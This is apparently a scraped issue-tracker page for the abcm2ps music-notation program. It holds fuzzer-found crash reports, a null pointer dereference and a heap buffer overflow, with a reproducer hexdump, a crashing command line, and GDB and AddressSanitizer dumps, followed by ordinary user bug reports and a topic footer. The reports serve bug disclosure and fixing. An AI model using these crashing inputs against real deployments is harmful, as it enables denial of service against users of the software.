2.1 -2.9 RL 0.7 0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL\n\t-2.2 -2.2 RL -2.1 2.9 RL -0.7 -0.7 RL fill}!\n/t2ub{\t\t% usage: x y t2ub - mordent ending with an upper bar\n\t2 copy umrd 0.6 SLW\n\tM 5 4 RM 0 6 RL stroke}!\n/t3tab{\t\t% usage: x y t3tab - mordent + upper turn and bar\n\t4 add 2 copy exch 7.5 sub exch tr3 exch 7.5 add exch\n\t2 copy 0.6 SLW M 2 6 14 6 16 0 RC\n\tM 8 1 RM 0 6 RL stroke}!\n/ubt3ta{\t% usage: x y ubt3ta - up bar + mordent + upper turn\n\t4 add 2 copy 0.6 SLW\n\tM -7.5 0 RM 0 6 RL stroke\n\t2 copy exch 7.5 sub exch tr3\n\tM 7.5 0 RM 2 6 14 6 16 0 RC stroke}!\n/tbt3{\t\t% usage: x y tbt3 - low turn + long mordent\n\texch 10 sub exch 6 add 2 copy 0.6 SLW\n\tM -8 0 RM 2 -6 14 -6 16 0 RC stroke\n\texch 8 add exch tr3}!\n/t2ta{\t\t% usage: x y t2ta - mordent + upper turn\n\t2 copy umrd\n\tM 5 4 RM 1 5 9 5 10 0 RC stroke}!\n/t3b{\t\t% usage: x y t3b - upper + lower mordent\n\t2 copy exch -7.5 add exch 4 add tr3 0.6 SLW\n\tM 2.5 0 RM 0 8 RL stroke}!\n gcshow", len=0x6c7)
[#3] 0x4d697d → Name: user_ps_write()
[#4] 0x41c747 → Name: init_page()
[#5] 0x41e58a → Name: write_buffer()
[#6] 0x4200c8 → Name: check_buffer()
[#7] 0x49a25c → Name: output_music()
[#8] 0x4a1368 → Name: generate()
[#9] 0x4a16eb → Name: gen_ly(eob=0x0)
gef➤ p stack
$1 = (struct elt_s *) 0x0
gef➤ p *stack
Cannot access memory at address 0x0
Reproducer file - Reproducer
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master).
Tested environment : 64-bit ubuntu 16.04 LTS
Affected version : 8.14.1-master
Command :
./abcm2ps -E -g -x -v -O fff -O = -i -k 1 POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Vulnerable code :
if (gcur.font_s != h || strcmp(fontnames[n], gcur.font_n) != 0)
{
free(gcur.font_n_old);
gcur.font_n_old = gcur.font_n;
gcur.font_n = strdup(fontnames[n]);
gcur.font_s = h;
}
return;
Debug:
GDB :
Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$rax : 0x0
$rbx : 0x5555557c3880 → 0x00005555557ddb30 → "sans-serif"
$rcx : 0x0
$rdx : 0x5555557d1010 → 0x0001000100000102
$rsp : 0x7fffffffd6d8 → 0x00007ffff76e39ae → <strdup+14> lea rbx, [rax+0x1]
$rbp : 0x0
$rsi : 0x5555557d1010 → 0x0001000100000102
$rdi : 0x0
$rip : 0x7ffff76f7646 → <__strlen_sse2+38> movdqu xmm4, XMMWORD PTR [rax]
$r8 : 0x0
$r9 : 0x0
$r10 : 0x7ffff77e4cc0 → 0x0002000200020002
$r11 : 0x5555555a6c41 → add BYTE PTR [rsi+0x61], ah
$r12 : 0x5555557d13dd → 0x006864726f636361 ("accordh"?)
$r13 : 0x5555557d13e4 → 0x2e383232297c2800
$r14 : 0x61
$r15 : 0xa
$eflags: [zero CARRY parity ADJUST SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$ds: 0x0000 $cs: 0x0033 $ss: 0x002b $fs: 0x0000 $gs: 0x0000 $es: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0x00007fffffffd6d8│+0x00: 0x00007ffff76e39ae → <strdup+14> lea rbx, [rax+0x1] ← $rsp
0x00007fffffffd6e0│+0x08: 0x00005555557d13e4 → 0x2e383232297c2800
0x00007fffffffd6e8│+0x10: 0x00005555557c3880 → 0x00005555557ddb30 → "sans-serif"
0x00007fffffffd6f0│+0x18: 0x0000000000000000
0x00007fffffffd6f8│+0x20: 0x00005555555959da → <ps_exec+890> movss xmm0, DWORD PTR [rsp]
0x00007fffffffd700│+0x28: 0x0000000000000000
0x00007fffffffd708│+0x30: 0x0000007743bd0000
0x00007fffffffd710│+0x38: 0x0000005b0000006e ("n"?)
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]────
0x7ffff76f7636 <__strlen_sse2+22> and rcx, 0xfff
0x7ffff76f763d <__strlen_sse2+29> cmp rcx, 0xfcf
0x7ffff76f7644 <__strlen_sse2+36> ja 0x7ffff76f76b0 <__strlen_sse2+144>
→ 0x7ffff76f7646 <__strlen_sse2+38> movdqu xmm4, XMMWORD PTR [rax]
0x7ffff76f764a <__strlen_sse2+42> pcmpeqb xmm4, xmm0
0x7ffff76f764e <__strlen_sse2+46> pmovmskb edx, xmm4
0x7ffff76f7652 <__strlen_sse2+50> test edx, edx
0x7ffff76f7654 <__strlen_sse2+52> je 0x7ffff76f765a <__strlen_sse2+58>
0x7ffff76f7656 <__strlen_sse2+54> bsf eax, edx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0x7ffff76f7646 → Name: __strlen_sse2()
[#1] 0x7ffff76e39ae → Name: __GI___strdup(s=0x0)
[#2] 0x5555555959da → Name: ps_exec(op=<optimized out>)
[#3] 0x55555559f609 → Name: seq_exec(e=<optimized out>)
[#4] 0x555555595719 → Name: ps_exec(op=0x5555557d13dd "accordh")
[#5] 0x55555559f270 → Name: svg_write(buf=0x5555557d1260 "% --- font 20.0 F2 \n/y0{-74.0 add}!\n/yns0{-74.0 add}!\n24.0 228.1 -74.0 bar \n24.0 378.0 -74.0 bar \ndlw 378.0 0.0 -74.0 M 0 RL 378.0 0.0 -68.0 M 0 RL 378.0 0.0 -62.0 M 0 RL 378.0 0.0 -56.0 M 0 RL 378.0 0.0 -50.0 M 0 RL stroke\n12.0 F0 44.7 38.4 yns0 M (A)gcshow\n134.1 38.4 yns0 M (F)gcshow\n237.8 38.4 yns0 M (G)gcshow\n337.0 38.4 yns0 M (C)gcshow\n/y{-87.0 yns0}def 13.0 F3 378.0 0 y 2 accordh", len=0x287)
[#6] 0x55555559fcdf → Name: svg_write(buf=0x5555557d1260 "% --- font 20.0 F2 \n/y0{-74.0 add}!\n/yns0{-74.0 add}!\n24.0 228.1 -74.0 bar \n24.0 378.0 -74.0 bar \ndlw 378.0 0.0 -74.0 M 0 RL 378.0 0.0 -68.0 M 0 RL 378.0 0.0 -62.0 M 0 RL 378.0 0.0 -56.0 M 0 RL 378.0 0.0 -50.0 M 0 RL stroke\n12.0 F0 44.7 38.4 yns0 M (A)gcshow\n134.1 38.4 yns0 M (F)gcshow\n237.8 38.4 yns0 M (G)gcshow\n337.0 38.4 yns0 M (C)gcshow\n/y{-87.0 yns0}def 13.0 F3 378.0 0 y 2 accordh", len=<optimized out>)
[#7] 0x5555555639eb → Name: write_buffer()
[#8] 0x555555565215 → Name: write_buffer()
[#9] 0x555555565215 → Name: block_put()
gef➤ p fontnames[0x0]
$1 = 0x5555557ddb30 "sans-serif"
gef➤ p fontnames[0x1]
$2 = 0x5555557ddb50 "serif-Italic"
gef➤ p fontnames[0x2]
$3 = 0x5555557ddb70 "serif"
gef➤ p fontnames[0x3]
$4 = 0x5555557ddb90 "serif-Bold"
gef➤ p fontnames[0x9]
$5 = 0x0
gef➤ i r
rax 0x0 0x0
rbx 0x5555557c3880 0x5555557c3880
rcx 0x0 0x0
rdx 0x5555557d1010 0x5555557d1010
rsi 0x5555557d1010 0x5555557d1010
rdi 0x0 0x0
rbp 0x0 0x0
rsp 0x7fffffffd6d8 0x7fffffffd6d8
r8 0x0 0x0
r9 0x0 0x0
r10 0x7ffff77e4cc0 0x7ffff77e4cc0
r11 0x5555555a6c41 0x5555555a6c41
r12 0x5555557d13dd 0x5555557d13dd
r13 0x5555557d13e4 0x5555557d13e4
r14 0x61 0x61
r15 0xa 0xa
rip 0x7ffff76f7646 0x7ffff76f7646 <__strlen_sse2+38>
eflags 0x10293 [ CF AF SF IF RF]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Reproducer file - Reproducer
Reproducer: abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc.zip (SHA1: a9b2a139ef095743544fbf78fb68291ac4549f37)
Tested in: 070cfe6
Fuzzing tool used: afl-2.52b
00000000 58 3a 30 0b 0d 30 30 30 30 30 30 30 30 30 0a 4d |X:0..000000000.M|
00000010 3a 34 2f 34 0a 30 30 30 30 30 30 30 0a 4b 3a 30 |:4/4.0000000.K:0|
00000020 0a 7c 1a 47 41 42 63 20 64 65 64 42 7c 64 65 64 |.|.GABc dedB|ded|
00000030 42 20 64 65 63 20 5e 30 30 42 7c 63 32 30 30 30 |B dec ^00B|c2000|
00000040 30 30 42 0a 7c 3a 67 36 67 66 20 5c 64 42 64 5b |00B.|:g6gf \dBd[|
00000050 67 32 66 29 2e 65 11 64 32 30 63 32 30 63 20 73 |g2f).e.d20c20c s|
00000060 30 64 64 66 7c 0a 28 30 |0ddf|.(0|
00000068
./abcm2ps abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc
abcm2ps-8.13.20 (2018-02-21)
File abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:6:1: error: Bad character
6 |GABc dedB|dedB dec ^00B|c200000B
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:7: error: '\' ignored
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:18: error: Not a note
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:26: error: Not a note
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:28: error: Not a note
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:31: error: Too many notes in chord
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:32: error: Too many notes in chord
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:32: error: Not a note
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
abcm2ps-heap-buffer-overflow-abcparse.c-parse_line.abc:7:12: error: Chord not closed
7 |:g6gf \dBd[g2f).ed20c20c s0ddf|
^
=================================================================
==12611==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028ff at pc 0x55ff23ed14cd bp 0x7fffc3d7d7f0 sp 0x7fffc3d7d7e8
READ of size 1 at 0x6250000028ff thread T0
#0 0x55ff23ed14cc in parse_line /home/hsalo/src/abcm2ps/abcparse.c:2149
#1 0x55ff23ed14cc in abc_parse /home/hsalo/src/abcm2ps/abcparse.c:164
#2 0x55ff23f8d010 in txt_add_eos /home/hsalo/src/abcm2ps/front.c:379
#3 0x55ff23f8d010 in frontend /home/hsalo/src/abcm2ps/front.c:891
#4 0x55ff23eaaf3e in treat_file /home/hsalo/src/abcm2ps/abcm2ps.c:239
#5 0x55ff23ea72b6 in main /home/hsalo/src/abcm2ps/abcm2ps.c:1040
#6 0x7f2a28e7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
#7 0x55ff23ea9649 in _start (/home/hsalo/src/abcm2ps/abcm2ps+0x37649)
0x6250000028ff is located 1 bytes to the left of 8192-byte region [0x625000002900,0x625000004900)
allocated by thread T0 here:
#0 0x7f2a295c3d28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28)
#1 0x55ff23f8a697 in txt_add /home/hsalo/src/abcm2ps/front.c:109
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hsalo/src/abcm2ps/abcparse.c:2149 in parse_line
Shadow bytes around the buggy address:
0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==12611==ABORTING
Hello,
I tried the following directive at the beginning of my abc file:
%%musicfont url(../Bravura.otf)
Unfortunately the following output is processed:
Also %%musicfont Bravura didn't work. The font is installed at /usr/local/share/fonts and recognized from other programs.
By the way. I got the same output with abcjs24 and abctopdf from abc2svg:
Thanks in advance,
Max
PS.: abcm2ps is a great application. Thank you so much for creating such a phantastic piece of software!
Hello,
First of all, thank you very very much for this wonderful piece of software.
I get a segmentation fault error, if the clef change is between slurs. See the following example of the beginning of a Brahms song:
X: 1
T: Wie bist Du, meine Königin
M: 3/8
L: 1/8
V:1
V:2 merge
V:3
K: Db
V:1
(dcB)| (gfe) | (agf) | (=abc) |
V:2
x3 | BA>c | !<(!e/A/c>d!<)! | !>(!c>BA/G/!>)! |
V:1
d2z | d'c'b | b>ae/f/ | g>fc/d/ |
V:2
F2x | d3 | x3 | x3 |
V:1
(efg | a2 =g) | [Aea]2 z | (f2 g) |
V:2
!<(!c2 c | (edB) !<)! | x3 | !<(!_c2 B |
V:1
(a2 f | g2 d) | =c2 z | d'2 a |
V:2
A3 !<)! | G2 G | G2 z | [df]3 |
V:1
f2 z | (d'af) | (gfe) | (dcB) | (gfe) |
V:2
d2 z | [df]2 d | [Gc]2 [Gc] |F2 z | BA>c
%
%
V:3 bass
[L: 1/16] z (D,,A,,D,F,A,) | z (E,,A,,C,G,A,) | z (G,,D,G,[A,,E,]A,) |
V:3
(D,,A,,D,F,A,D | [K: treble] F) (F,CDFA | c4) B2 & (EGEGDG) | A4 G2 & (CECEB,E) |
If I change the last line as follows, everything works fine:
(D,,A,,D,F,A,D | F) [K: treble] (F,CDFA | c4) B2 & (EGEGDG) | A4 G2 & (CECEB,E) |
Thanks in advance,
Max
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.